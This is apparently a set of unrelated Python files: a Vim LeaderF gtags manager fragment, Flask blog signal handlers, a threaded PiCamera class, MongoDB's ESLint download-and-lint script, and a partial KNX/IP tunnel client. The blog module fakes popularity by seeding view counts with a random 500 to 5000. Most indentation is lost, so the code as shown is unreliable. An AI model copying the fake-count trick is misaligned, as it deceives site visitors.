id = int(lfEval("matchid"))
self._match_ids.append(id)
except vim.error:
pass
else:
if self._getExplorer().getResultFormat() is None:
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '^.\{-}\ze\t')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '\t\zs\d\+\ze\t')"""))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags":
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '\t\zs.\{-}\ze\t')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '\t\zs\d\+$')"""))
self._match_ids.append(id)
elif self._getExplorer().getResultFormat() == "ctags-x":
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '^\S\+\s\+\d\+\s\+\zs\S\+')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '^\S\+\s\+\zs\d\+')"""))
self._match_ids.append(id)
else: # ctags-mod
id = int(lfEval("""matchadd('Lf_hl_gtagsFileName', '^.\{-}\ze\t')"""))
self._match_ids.append(id)
id = int(lfEval("""matchadd('Lf_hl_gtagsLineNumber', '\t\zs\d\+\ze\t')"""))
self._match_ids.append(id)
try:
for i in self._getExplorer().getPatternRegex():
id = int(lfEval("matchadd('Lf_hl_gtagsHighlight', '%s', 9)" % escQuote(i)))
self._match_ids.append(id)
except vim.error:
pass
def _beforeExit(self):
super(GtagsExplManager, self)._beforeExit()
if self._timer_id is not None:
lfCmd("call timer_stop(%s)" % self._timer_id)
self._timer_id = None
for k, v in self._cursorline_dict.items():
if k.valid:
k.options["cursorline"] = v
self._cursorline_dict.clear()
def _bangEnter(self):
super(GtagsExplManager, self)._bangEnter()
if lfEval("exists('*timer_start')") == '0':
lfCmd("echohl Error | redraw | echo ' E117: Unknown function: timer_start' | echohl NONE")
return
if "--recall" not in self._arguments:
self._workInIdle(bang=True)
if self._read_finished < 2:
self._timer_id = lfEval("timer_start(1, 'leaderf#Gtags#TimerCallback', {'repeat': -1})")
else:
instance = self._getInstance()
if instance.isLastReverseOrder():
instance.window.cursor = (min(instance.cursorRow, len(instance.buffer)), 0)
else:
instance.window.cursor = (max(instance.cursorRow - instance.helpLength, 1), 0)
if instance.getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal cursorline')" % instance.getPopupWinId())
elif instance.getWinPos() == 'floatwin':
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % instance.getPopupWinId())
else:
instance.window.options["cursorline"] = True
def deleteCurrentLine(self):
instance = self._getInstance()
if self._inHelpLines():
return
if instance.getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'setlocal modifiable')" % instance.getPopupWinId())
else:
lfCmd("setlocal modifiable")
line = instance._buffer_object[instance.window.cursor[0] - 1]
if len(self._content) > 0:
self._content.remove(line)
self._getInstance().setStlTotal(len(self._content)//self._getUnit())
self._getInstance().setStlResultsCount(len(self._content)//self._getUnit())
# `del vim.current.line` does not work in neovim
# https://github.com/neovim/neovim/issues/9361
del instance._buffer_object[instance.window.cursor[0] - 1]
if instance.getWinPos() == 'popup':
instance.refreshPopupStatusline()
lfCmd("call win_execute(%d, 'setlocal nomodifiable')" % instance.getPopupWinId())
else:
lfCmd("setlocal nomodifiable")
def getArguments(self):
if self._getExplorer().getLastResultFormat() is not None and \
"--append" in self._arguments:
del self._arguments["--append"]
return self._arguments
def _supportsRefine(self):
return True
def startExplorer(self, win_pos, *args, **kwargs):
if "through" in kwargs.get("arguments", {}).get("--path-style", []):
self._orig_cwd = os.getcwd()
# https://github.com/neovim/neovim/issues/8336
if lfEval("has('nvim')") == '1':
chdir = vim.chdir
else:
chdir = os.chdir
if vim.current.buffer.name:
path = os.path.dirname(lfDecode(vim.current.buffer.name))
else:
path = os.getcwd()
root_markers = lfEval("g:Lf_RootMarkers")
project_root = self._getExplorer()._nearestAncestor(root_markers, path)
if project_root == "" and path != os.getcwd():
project_root = self._getExplorer()._nearestAncestor(root_markers, os.getcwd())
if project_root:
chdir(project_root)
super(GtagsExplManager, self).startExplorer(win_pos, *args, **kwargs)
def _previewInPopup(self, *args, **kwargs):
if len(args) == 0:
return
line = args[0]
if self._getExplorer().getResultFormat() is None:
file, line_num = line.split('\t', 2)[:2]
elif self._getExplorer().getResultFormat() == "ctags":
file, line_num = line.split('\t', 2)[1:]
elif self._getExplorer().getResultFormat() == "ctags-x":
line_num, file = line.split(None, 3)[1:3]
else: # ctags-mod
file, line_num = line.split('\t', 2)[:2]
if not os.path.isabs(file):
file = os.path.join(self._getInstance().getCwd(), lfDecode(file))
file = os.path.normpath(lfEncode(file))
buf_number = lfEval("bufadd('{}')".format(escQuote(file)))
self._createPopupPreview("", buf_number, line_num)
#*****************************************************
# gtagsExplManager is a singleton
#*****************************************************
gtagsExplManager = GtagsExplManager()
__all__ = ['gtagsExplManager']
|
signals.py
|
from threading import Thread
from blinker import Namespace
from flask import request, url_for
from mongoengine import DoesNotExist
from .models import Tracker, PostStatistic
from .settings import BlogSettings
from .utils import submit_url_to_baidu
# Create the signals
app_signals = Namespace()
post_visited = app_signals.signal('post-visited')
post_published = app_signals.signal('post-published')
# Create the signal subscribers
@post_visited.connect
def on_post_visited(sender, post, **kwargs):
    """Update the post's statistics and visit record.
    After a post is viewed, collect the visitor's information and update the post's statistics.
    """
tracker = Tracker(post=post)
    # Get the request's source IP and user agent
proxy_list = request.headers.getlist('X-Forwarded-For')
tracker.ip = proxy_list[0] if proxy_list else request.remote_addr
tracker.user_agent = request.headers.get('User-Agent')
tracker.save()
    # Get the post's statistics; create and initialize them if they don't exist yet
try:
post_statistic = PostStatistic.objects.get(post=post)
except DoesNotExist:
post_statistic = PostStatistic(post=post, post_type=post.type)
from random import randint
post_statistic.verbose_count_base = randint(500, 5000)
post_statistic.save()
post_statistic.modify(inc__visit_count=1)
@post_published.connect
def on_post_published(sender, post):
    """Apply SEO optimization to the post.
    After a post is published, submit its URL to the Baidu webmaster platform so that it
    gets indexed in search results.
    """
# post_type = post.type
# endpoints = {
# 'post': 'blog.show_post',
# 'page': 'blog.show_page'
# }
# post_url = url_for(endpoints[post_type], slug=post.slug, _external=True)
# baidu_url = BlogSettings.SEARCH_ENGINE_SUBMIT_URLS['baidu']
# if baidu_url:
    # # Send the network request asynchronously
# thr = Thread(target=submit_url_to_baidu, args=(baidu_url, post_url))
# thr.start()
# return thr
# else:
# print('Not ready to submit urls yet')
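# A minimal sketch of how these signals might be emitted from the view layer
# (assumed call sites; the real ones live in the blog's view functions):
#
#   from flask import current_app
#   post_visited.send(current_app._get_current_object(), post=post)
#   post_published.send(current_app._get_current_object(), post=post)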
|
HizlandirilmisPiKamera.py
|
from picamera import PiCamera
from picamera.array import PiRGBArray
from threading import Thread
import cv2
class HizlandirilmisPiKamera:
def __init__(self, cozunurluk=(640, 480)):
self.camera = PiCamera()
self.camera.resolution = cozunurluk
self.hamKare = PiRGBArray(self.camera, size=self.camera.resolution)
self.yayin = self.camera.capture_continuous(self.hamKare, format="bgr", use_video_port=True)
self.suAnkiKare = None
self.penceredeGosterilecekler = dict()
self.kameraGostermeAktif = False
def veriOkumayaBasla(self):
Thread(target=self.__veriGuncelle__, args=()).start()
return self
def __veriGuncelle__(self):
for f in self.yayin:
self.suAnkiKare = f.array
self.hamKare.truncate(0)
def veriOku(self):
return self.suAnkiKare
def kareyiGoster(self, pencereninIsmi="frame", gosterilecekGoruntu=None):
if gosterilecekGoruntu is None:
self.penceredeGosterilecekler[pencereninIsmi] = self.suAnkiKare
else:
self.penceredeGosterilecekler[pencereninIsmi] = gosterilecekGoruntu
if not self.kameraGostermeAktif:
Thread(target=self.__kareyiGostermeyiGuncelle__, args=()).start()
def __kareyiGostermeyiGuncelle__(self):
self.kameraGostermeAktif = True
while True:
for isim in self.penceredeGosterilecekler.copy():
cv2.imshow(isim, self.penceredeGosterilecekler[isim])
key = cv2.waitKey(1)
if key == ord("q"):
cv2.destroyAllWindows()
break
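# A minimal usage sketch (an assumption, not part of the original module):
# start the background capture thread, then poll frames and hand them to the
# display thread. Press 'q' in the preview window to close it.
if __name__ == "__main__":
    import time
    kamera = HizlandirilmisPiKamera(cozunurluk=(640, 480)).veriOkumayaBasla()
    time.sleep(2)  # give the capture thread time to deliver the first frame
    while True:
        kare = kamera.veriOku()
        if kare is not None:
            kamera.kareyiGoster("onizleme", kare)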
|
eslint.py
|
#!/usr/bin/env python
"""
eslint.py
Will download a prebuilt ESLint binary if necessary (i.e. it isn't installed, isn't in the current
path, or is the wrong version). It works in much the same way as clang_format.py. In lint mode, it
will lint the files or directory paths passed. In lint-patch mode, for upload.py, it will see if
there are any candidate files in the supplied patch. Fix mode will run ESLint with the --fix
option, and that will update the files with missing semicolons and similar repairable issues.
There is also a -d mode that assumes you only want to run one copy of ESLint per file / directory
parameter supplied. This lets ESLint search for candidate files to lint.
"""
import Queue
import itertools
import os
import re
import shutil
import string
import subprocess
import sys
import tarfile
import tempfile
import threading
import time
import urllib
from distutils import spawn
from multiprocessing import cpu_count
from optparse import OptionParser
# Get relative imports to work when the package is not installed on the PYTHONPATH.
if __name__ == "__main__" and __package__ is None:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(os.path.realpath(__file__)))))
from buildscripts.resmokelib.utils import globstar
from buildscripts import moduleconfig
##############################################################################
#
# Constants for ESLint
#
#
# Expected version of ESLint.
ESLINT_VERSION = "2.3.0"
# Name of ESLint as a binary.
ESLINT_PROGNAME = "eslint"
# URL location of our provided ESLint binaries.
ESLINT_HTTP_LINUX_CACHE = "https://s3.amazonaws.com/boxes.10gen.com/build/eslint-" + \
ESLINT_VERSION + "-linux.tar.gz"
ESLINT_HTTP_DARWIN_CACHE = "https://s3.amazonaws.com/boxes.10gen.com/build/eslint-" + \
ESLINT_VERSION + "-darwin.tar.gz"
# Path in the tarball to the ESLint binary.
ESLINT_SOURCE_TAR_BASE = string.Template(ESLINT_PROGNAME + "-$platform-$arch")
# Path to the modules in the mongodb source tree.
# Has to match the string in SConstruct.
MODULE_DIR = "src/mongo/db/modules"
# Copied from python 2.7 version of subprocess.py
# Exception classes used by this module.
class CalledProcessError(Exception):
"""This exception is raised when a process run by check_call() or
check_output() returns a non-zero exit status.
The exit status will be stored in the returncode attribute;
check_output() will also store the output in the output attribute.
"""
def __init__(self, returncode, cmd, output=None):
self.returncode = returncode
self.cmd = cmd
self.output = output
def __str__(self):
return ("Command '%s' returned non-zero exit status %d with output %s" %
(self.cmd, self.returncode, self.output))
# Copied from python 2.7 version of subprocess.py
def check_output(*popenargs, **kwargs):
r"""Run command with arguments and return its output as a byte string.
If the exit code was non-zero it raises a CalledProcessError. The
CalledProcessError object will have the return code in the returncode
attribute and output in the output attribute.
The arguments are the same as for the Popen constructor. Example:
>>> check_output(["ls", "-l", "/dev/null"])
'crw-rw-rw- 1 root root 1, 3 Oct 18 2007 /dev/null\n'
The stdout argument is not allowed as it is used internally.
To capture standard error in the result, use stderr=STDOUT.
>>> check_output(["/bin/sh", "-c",
... "ls -l non_existent_file ; exit 0"],
... stderr=STDOUT)
'ls: non_existent_file: No such file or directory\n'
"""
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
raise CalledProcessError(retcode, cmd, output)
return output
def callo(args):
"""Call a program, and capture its output
"""
return check_output(args)
def extract_eslint(tar_path, target_file):
tarfp = tarfile.open(tar_path)
for name in tarfp.getnames():
if name == target_file:
tarfp.extract(name)
tarfp.close()
def get_eslint_from_cache(dest_file, platform, arch):
"""Get ESLint binary from mongodb's cache
"""
# Get URL
if platform == "Linux":
url = ESLINT_HTTP_LINUX_CACHE
elif platform == "Darwin":
url = ESLINT_HTTP_DARWIN_CACHE
else:
raise ValueError('ESLint is not available as a binary for ' + platform)
dest_dir = tempfile.gettempdir()
temp_tar_file = os.path.join(dest_dir, "temp.tar.gz")
# Download the file
print("Downloading ESLint %s from %s, saving to %s" % (ESLINT_VERSION,
url, temp_tar_file))
urllib.urlretrieve(url, temp_tar_file)
eslint_distfile = ESLINT_SOURCE_TAR_BASE.substitute(platform=platform, arch=arch)
extract_eslint(temp_tar_file, eslint_distfile)
shutil.move(eslint_distfile, dest_file)
class ESLint(object):
"""Class encapsulates finding a suitable copy of ESLint, and linting an individual file
"""
def __init__(self, path, cache_dir):
eslint_progname = ESLINT_PROGNAME
# Initialize ESLint configuration information
if sys.platform.startswith("linux"):
self.arch = "x86_64"
self.tar_path = None
elif sys.platform == "darwin":
self.arch = "x86_64"
self.tar_path = None
self.path = None
# Find ESLint now
if path is not None:
if os.path.isfile(path):
self.path = path
else:
print("WARNING: Could not find ESLint at %s" % (path))
# Check the environment variable
if "MONGO_ESLINT" in os.environ:
self.path = os.environ["MONGO_ESLINT"]
if self.path and not self._validate_version(warn=True):
self.path = None
# Check the user's PATH environment variable now
if self.path is None:
self.path = spawn.find_executable(eslint_progname)
if self.path and not self._validate_version(warn=True):
self.path = None
# Have not found it yet, download it from the web
if self.path is None:
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
self.path = os.path.join(cache_dir, eslint_progname)
if not os.path.isfile(self.path):
if sys.platform.startswith("linux"):
get_eslint_from_cache(self.path, "Linux", self.arch)
elif sys.platform == "darwin":
get_eslint_from_cache(self.path, "Darwin", self.arch)
else:
print("ERROR: eslint.py does not support downloading ESLint " +
"on this platform, please install ESLint " + ESLINT_VERSION)
# Validate we have the correct version
if not self._validate_version():
raise ValueError('correct version of ESLint was not found.')
self.print_lock = threading.Lock()
def _validate_version(self, warn=False):
"""Validate ESLint is the expected version
"""
esl_version = callo([self.path, "--version"]).rstrip()
# Ignore the leading v in the version string.
if ESLINT_VERSION == esl_version[1:]:
return True
if warn:
print("WARNING: eslint found in path, but incorrect version found at " +
self.path + " with version: " + esl_version)
return False
def _lint(self, file_name, print_diff):
"""Check the specified file for linting errors
"""
# ESLint returns non-zero on a linting error. That's all we care about
# so only enter the printing logic if we have an error.
try:
eslint_output = callo([self.path, "-f", "unix", file_name])
except CalledProcessError as e:
if print_diff:
# Take a lock to ensure error messages do not get mixed when printed to the screen
with self.print_lock:
print("ERROR: ESLint found errors in " + file_name)
print(e.output)
return False
except:
print("ERROR: ESLint process threw unexpected error", sys.exc_info()[0])
return False
return True
def lint(self, file_name):
"""Check the specified file has no linting errors
"""
return self._lint(file_name, print_diff=True)
def autofix(self, file_name):
""" Run ESLint in fix mode.
"""
return not subprocess.call([self.path, "--fix", file_name])
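# A minimal usage sketch (an assumption, not part of the original script):
# locate or download a suitable ESLint binary and lint a single file. The
# cache directory and file name below are only illustrative.
def _example_lint_one_file():
    linter = ESLint(None, "build")            # search env/PATH, else download
    return linter.lint("jstests/example.js")  # hypothetical file to lint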
def parallel_process(items, func):
"""Run a set of work items to completion
"""
try:
cpus = cpu_count()
except NotImplementedError:
cpus = 1
task_queue = Queue.Queue()
# Use a list so that worker function will capture this variable
pp_event = threading.Event()
pp_result = [True]
pp_lock = threading.Lock()
def worker():
"""Worker thread to process work items in parallel
"""
while not pp_event.is_set():
try:
item = task_queue.get_nowait()
except Queue.Empty:
# if the queue is empty, exit the worker thread
pp_event.set()
return
try:
ret = func(item)
finally:
# Tell the queue we finished with the item
task_queue.task_done()
# Return early if we fail, and signal we are done
if not ret:
with pp_lock:
pp_result[0] = False
pp_event.set()
return
# Enqueue all the work we want to process
for item in items:
task_queue.put(item)
# Process all the work
threads = []
for cpu in range(cpus):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
threads.append(thread)
# Wait for the threads to finish
# Loop with a timeout so that we can process Ctrl-C interrupts
# Note: On Python 2.6 wait always returns None so we check is_set also,
# This works because we only set the event once, and never reset it
while not pp_event.wait(1) and not pp_event.is_set():
time.sleep(1)
for thread in threads:
thread.join()
return pp_result[0]
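# A minimal usage sketch (an assumption, not part of the original script):
# parallel_process() runs `func` over `items` with one worker thread per CPU
# and returns False as soon as any call returns a falsy value.
def _example_parallel_process():
    files = ["a.js", "b.js", "c.js"]   # hypothetical work items
    return parallel_process(files, lambda name: len(name) > 0)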
def get_base_dir():
"""Get the base directory for mongo repo.
This script assumes that it is running in buildscripts/, and uses
that to find the base directory.
"""
try:
return subprocess.check_output(['git', 'rev-parse', '--show-toplevel']).rstrip()
except:
# We are not in a valid git directory. Use the script path instead.
return os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
def get_repos():
"""Get a list of linked repos and directories to run ESLint on.
"""
base_dir = get_base_dir()
# Get a list of modules
# TODO: how do we filter rocks, does it matter?
mongo_modules = moduleconfig.discover_module_directories(
os.path.join(base_dir, MODULE_DIR), None)
paths = [os.path.join(base_dir, MODULE_DIR, m) for m in mongo_modules]
paths.append(base_dir)
return [Repo(p) for p in paths]
class Repo(object):
"""Class encapsulates all knowledge about a git repository, and its metadata
to run ESLint.
"""
def __init__(self, path):
self.path = path
# Get candidate files
self.candidate_files = self.get_candidate_files()
self.root = self._get_root()
def _callgito(self, args):
"""Call git for this repository
"""
# These two flags are the equivalent of -C in newer versions of Git
# but we use these to support versions back to ~1.8
return callo(['git', '--git-dir', os.path.join(self.path, ".git"),
'--work-tree', self.path] + args)
def _get_local_dir(self, path):
"""Get a directory path relative to the git root directory
"""
if os.path.isabs(path):
return os.path.relpath(path, self.root)
return path
def get_candidates(self, candidates):
"""Get the set of candidate files to check by doing an intersection
between the input list, and the list of candidates in the repository
Returns the full path to the files for ESLint to consume.
"""
# NOTE: Files may have an absolute root (i.e. leading /)
if candidates is not None and len(candidates) > 0:
candidates = [self._get_local_dir(f) for f in candidates]
valid_files = list(set(candidates).intersection(self.get_candidate_files()))
else:
valid_files = list(self.get_candidate_files())
# Get the full file names here
valid_files = [os.path.normpath(os.path.join(self.root, f)) for f in valid_files]
return valid_files
def _get_root(self):
"""Gets the root directory for this repository from git
"""
gito = self._callgito(['rev-parse', '--show-toplevel'])
return gito.rstrip()
def get_candidate_files(self):
"""Query git to get a list of all files in the repo to consider for analysis
"""
gito = self._callgito(["ls-files"])
# This allows us to pick all the interesting files
# in the mongo and mongo-enterprise repos
file_list = [line.rstrip()
for line in gito.splitlines()
if "src/mongo" in line or "jstests" in line]
files_match = re.compile('\\.js$')
file_list = [a for a in file_list if files_match.search(a)]
return file_list
def expand_file_string(glob_pattern):
"""Expand a string that represents a set of files
"""
return [os.path.abspath(f) for f in globstar.iglob(glob_pattern)]
def get_files_to_check(files):
"""Filter the specified list of files to check down to the actual
list of files that need to be checked."""
candidates = []
# Get a list of candidate_files
candidates = [expand_file_string(f) for f in files]
candidates = list(itertools.chain.from_iterable(candidates))
repos = get_repos()
valid_files = list(itertools.chain.from_iterable([r.get_candidates(candidates) for r in repos]))
return valid_files
def get_files_to_check_from_patch(patches):
"""Take a patch file generated by git diff, and scan the patch for a list of files to check.
"""
candidates = []
# Get a list of candidate_files
check = re.compile(r"^diff --git a\/([\w\/\.\-]+) b\/[\w\/\.\-]+")
lines = []
for patch in patches:
with open(patch, "rb") as infile:
lines += infile.readlines()
candidates = [check.match(line).group(1) for line in lines if check.match(line)]
repos = get_repos()
valid_files = list(itertools.chain.from_iterable([r.get_candidates(candidates) for r in repos]))
return valid_files
def _get_build_dir():
"""Get the location of the scons build directory in case we need to download ESLint
"""
return os.path.join(get_base_dir(), "build")
def _lint_files(eslint, files):
"""Lint a list of files with ESLint
"""
eslint = ESLint(eslint, _get_build_dir())
lint_clean = parallel_process([os.path.abspath(f) for f in files], eslint.lint)
if not lint_clean:
print("ERROR: ESLint found errors. Run ESLint manually to see errors in "\
"files that were skipped")
sys.exit(1)
return True
def lint_patch(eslint, infile):
"""Lint patch command entry point
"""
files = get_files_to_check_from_patch(infile)
# Patch may have files that we do not want to check which is fine
if files:
return _lint_files(eslint, files)
return True
def lint(eslint, dirmode, glob):
"""Lint files command entry point
"""
if dirmode and glob:
files = glob
else:
files = get_files_to_check(glob)
_lint_files(eslint, files)
return True
def _autofix_files(eslint, files):
"""Auto-fix the specified files with ESLint.
"""
eslint = ESLint(eslint, _get_build_dir())
autofix_clean = parallel_process([os.path.abspath(f) for f in files], eslint.autofix)
    if not autofix_clean:
        print("ERROR: failed to auto-fix files")
        return False
    return True
def autofix_func(eslint, dirmode, glob):
"""Auto-fix files command entry point
"""
if dirmode:
files = glob
else:
files = get_files_to_check(glob)
return _autofix_files(eslint, files)
def main():
"""Main entry point
"""
success = False
usage = "%prog [-e <eslint>] [-d] lint|lint-patch|fix [glob patterns] "
description = "lint runs ESLint on provided patterns or all .js files under jstests/ "\
"and src/mongo. lint-patch runs ESLint against .js files modified in the "\
"provided patch file (for upload.py). "\
"fix runs ESLint with --fix on provided patterns "\
"or files under jstests/ and src/mongo."
    epilog = "*Unless you specify -d a separate ESLint process will be launched for every file"
    parser = OptionParser(usage=usage, description=description, epilog=epilog)
parser.add_option("-e", "--eslint", type="string", dest="eslint",
help="Fully qualified path to eslint executable",)
parser.add_option("-d", "--dirmode", action="store_true", default=True, dest="dirmode",
help="Considers the glob patterns as directories and runs ESLint process " \
"against each pattern",)
(options, args) = parser.parse_args(args=sys.argv)
if len(args) > 1:
command = args[1]
searchlist = args[2:]
if not searchlist:
searchlist = ["jstests/", "src/mongo/"]
if command == "lint":
success = lint(options.eslint, options.dirmode, searchlist)
elif command == "lint-patch":
if not args[2:]:
success = False
print("You must provide the patch's fully qualified file name with lint-patch")
else:
success = lint_patch(options.eslint, searchlist)
elif command == "fix":
success = autofix_func(options.eslint, options.dirmode, searchlist)
else:
parser.print_help()
else:
parser.print_help()
sys.exit(0 if success else 1)
if __name__ == "__main__":
main()
|
ip.py
|
"""Module to connect to a KNX bus using a KNX/IP tunnelling interface.
"""
import socket
import threading
import logging
import time
import queue
import socketserver as SocketServer
from knxip.core import KNXException, ValueCache, E_NO_ERROR
from knxip.helper import int_to_array, ip_to_array
from knxip.gatewayscanner import GatewayScanner
class KNXIPFrame():
"""Representation of a KNX/IP frame."""
SEARCH_REQUEST = 0x0201
SEARCH_RESPONSE = 0x0202
DESCRIPTION_REQUEST = 0x0203
DESCRIPTION_RESPONSE = 0x0204
CONNECT_REQUEST = 0x0205
CONNECT_RESPONSE = 0x0206
CONNECTIONSTATE_REQUEST = 0x0207
CONNECTIONSTATE_RESPONSE = 0x0208
DISCONNECT_REQUEST = 0x0209
DISCONNECT_RESPONSE = 0x020a
DEVICE_CONFIGURATION_REQUEST = 0x0310
    DEVICE_CONFIGURATION_ACK = 0x0311
TUNNELING_REQUEST = 0x0420
TUNNELLING_ACK = 0x0421
ROUTING_INDICATION = 0x0530
ROUTING_LOST_MESSAGE = 0x0531
DEVICE_MGMT_CONNECTION = 0x03
TUNNEL_CONNECTION = 0x04
REMLOG_CONNECTION = 0x06
REMCONF_CONNECTION = 0x07
OBJSVR_CONNECTION = 0x08
# CONNECTIONSTATE_RESPONSE Status Codes
# 3.8.2 - 7.8.4
E_DATA_CONNECTION = 0x26
E_CONNECTION_ID = 0x21
E_KNX_CONNECTION = 0x27
# Generic Response Status Code
E_NO_ERROR = 0x0
body = None
def __init__(self, service_type_id):
"""Initalize an empty frame with the given service type."""
self.service_type_id = service_type_id
def to_frame(self):
"""Return the frame as an array of bytes."""
return bytearray(self.header() + self.body)
@classmethod
def from_frame(cls, frame):
"""Initilize the frame object based on a KNX/IP data frame."""
# TODO: Check length
ipframe = cls(frame[2] * 256 + frame[3])
ipframe.body = frame[6:]
return ipframe
def total_length(self):
"""Return the length of the frame (in bytes)."""
return 6 + len(self.body)
def header(self):
"""Return the frame header (as an array of bytes)."""
total_length = self.total_length()
res = [0x06, 0x10, 0, 0, 0, 0]
res[2] = (self.service_type_id >> 8) & 0xff
res[3] = (self.service_type_id >> 0) & 0xff
res[4] = (total_length >> 8) & 0xff
res[5] = (total_length >> 0) & 0xff
return res
# pylint: disable=too-few-public-methods
class KNXTunnelingRequest:
"""Representation of a KNX/IP tunnelling request."""
def __init__(self):
"""Initialize object."""
self.seq = 0
self.cemi = None
self.channel = 0
@classmethod
def from_body(cls, body):
"""Create a tunnelling request from a given body of a KNX/IP frame."""
# TODO: Check length
request = cls()
request.channel = body[1]
request.seq = body[2]
request.cemi = body[4:]
return request
# pylint: disable=too-many-instance-attributes
class CEMIMessage():
"""Representation of a CEMI message."""
CMD_GROUP_READ = 1
CMD_GROUP_WRITE = 2
CMD_GROUP_RESPONSE = 3
CMD_UNKNOWN = 0xff
code = 0
ctl1 = 0
ctl2 = 0
src_addr = None
dst_addr = None
cmd = None
tpci_apci = 0
mpdu_len = 0
data = [0]
dptsize = 0
def __init__(self):
"""Initialize object."""
pass
@classmethod
def from_body(cls, cemi):
"""Create a new CEMIMessage initialized from the given CEMI data."""
# TODO: check that length matches
message = cls()
message.code = cemi[0]
offset = cemi[1]
message.ctl1 = cemi[2 + offset]
message.ctl2 = cemi[3 + offset]
message.src_addr = cemi[4 + offset] * 256 + cemi[5 + offset]
message.dst_addr = cemi[6 + offset] * 256 + cemi[7 + offset]
message.mpdu_len = cemi[8 + offset]
tpci_apci = cemi[9 + offset] * 256 + cemi[10 + offset]
apci = tpci_apci & 0x3ff
# for APCI codes see KNX Standard 03/03/07 Application layer
# table Application Layer control field
if apci & 0x080:
# Group write
message.cmd = CEMIMessage.CMD_GROUP_WRITE
elif apci == 0:
message.cmd = CEMIMessage.CMD_GROUP_READ
elif apci & 0x40:
message.cmd = CEMIMessage.CMD_GROUP_RESPONSE
else:
message.cmd = CEMIMessage.CMD_UNKNOWN
apdu = cemi[10 + offset:]
if len(apdu) != message.mpdu_len:
raise KNXException(
"APDU LEN should be {} but is {}".format(
message.mpdu_len, len(apdu)))
if len(apdu) == 1:
message.data = [apci & 0x2f]
else:
message.data = cemi[11 + offset:]
return message
def init_group(self, dst_addr=1):
"""Initilize the CEMI frame with the given destination address."""
self.code = 0x11
# frametype 1, repeat 1, system broadcast 1, priority 3, ack-req 0,
# confirm-flag 0
self.ctl1 = 0xbc
self.ctl2 = 0xe0 # dst addr type 1, hop count 6, extended frame format
self.src_addr = 0
self.dst_addr = dst_addr
def init_group_write(self, dst_addr=1, data=None, dptsize=0):
"""Initialize the CEMI frame for a group write operation."""
self.init_group(dst_addr)
# unnumbered data packet, group write
self.tpci_apci = 0x00 * 256 + 0x80
self.dptsize = dptsize
if data is None:
self.data = [0]
else:
self.data = data
def init_group_read(self, dst_addr=1):
"""Initialize the CEMI frame for a group read operation."""
self.init_group(dst_addr)
self.tpci_apci = 0x00 # unnumbered data packet, group read
self.data = [0]
def to_body(self):
"""Convert the CEMI frame object to its byte representation."""
body = [self.code, 0x00, self.ctl1, self.ctl2,
(self.src_addr >> 8) & 0xff, (self.src_addr >> 0) & 0xff,
(self.dst_addr >> 8) & 0xff, (self.dst_addr >> 0) & 0xff]
if self.dptsize == 0 and (len(self.data) == 1) and ((self.data[0] & 0xC0) == 0):
# less than 6 bit of data, pack into APCI byte
body.extend([1, (self.tpci_apci >> 8) & 0xff,
((self.tpci_apci >> 0) & 0xff) + self.data[0]])
else:
body.extend([1 + len(self.data), (self.tpci_apci >> 8) &
0xff, (self.tpci_apci >> 0) & 0xff])
body.extend(self.data)
return body
def __str__(self):
"""Return a human readable string for debugging."""
cmd = "??"
if self.cmd == self.CMD_GROUP_READ:
cmd = "RD"
elif self.cmd == self.CMD_GROUP_WRITE:
cmd = "WR"
elif self.cmd == self.CMD_GROUP_RESPONSE:
cmd = "RS"
return "{0:x}->{1:x} {2} {3}".format(
self.src_addr, self.dst_addr, cmd, self.data)
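# A minimal usage sketch (an assumption, not part of the original module):
# build the cEMI body for a 1-bit group write. The group address 0x0903
# (1/1/3) and the value [1] are only illustrative.
def _example_group_write_body():
    msg = CEMIMessage()
    msg.init_group_write(dst_addr=0x0903, data=[1])
    # Values smaller than 6 bits are packed into the APCI byte by to_body().
    return msg.to_body()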
class KNXIPTunnel():
"""A connection to a KNX/IP tunnelling interface."""
data_server = None
control_socket = None
channel = None
seq = 0
data_handler = None
result_queue = None
notify = None
address_listeners = {}
def __init__(self, ip="0.0.0.0", port=3671, valueCache=None):
"""Initialize the connection to the given host/port
Initialized the connection, but does not connect.
"""
self.remote_ip = ip
self.remote_port = port
self.discovery_port = None
self.data_port = None
self.connected = False
self.result_queue = queue.Queue()
self.ack_semaphore = threading.Semaphore(0)
self.conn_state_ack_semaphore = threading.Semaphore(0)
if valueCache is None:
self.value_cache = ValueCache()
else:
self.value_cache = valueCache
self.connection_state = 0
self.keepalive_thread = threading.Thread(target=self.keepalive,
args=())
self.keepalive_thread.daemon = True
self.keepalive_thread.start()
self._lock = threading.Lock()
self._write_delay = 0.05
def __del__(self):
"""Make sure an open tunnel connection will be closed"""
self.disconnect()
def keepalive(self):
"""Background method that makes sure the connection is still open."""
while True:
if self.connected:
self.check_connection_state()
time.sleep(60)
def connect(self, timeout=2):
"""Connect to the KNX/IP tunnelling interface.
If the remote address is "0.0.0.0", it will use the Gateway scanner
to automatically detect a KNX gateway and it will connect to it if one
has been found.
Returns true if a connection could be established, false otherwise
"""
if self.connected:
logging.info("KNXIPTunnel connect request ignored, "
"already connected")
return True
if self.remote_ip == "0.0.0.0":
scanner = GatewayScanner()
try:
ipaddr, port = scanner.start_search()
logging.info("Found KNX gateway %s/%s", ipaddr, port)
self.remote_ip = ipaddr
self.remote_port = port
except TypeError:
logging.error("No KNX/IP gateway given and no gateway "
"found by scanner, aborting %s")
# Clean up cache
self.value_cache.clear()
# Find my own IP
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((self.remote_ip, self.remote_port))
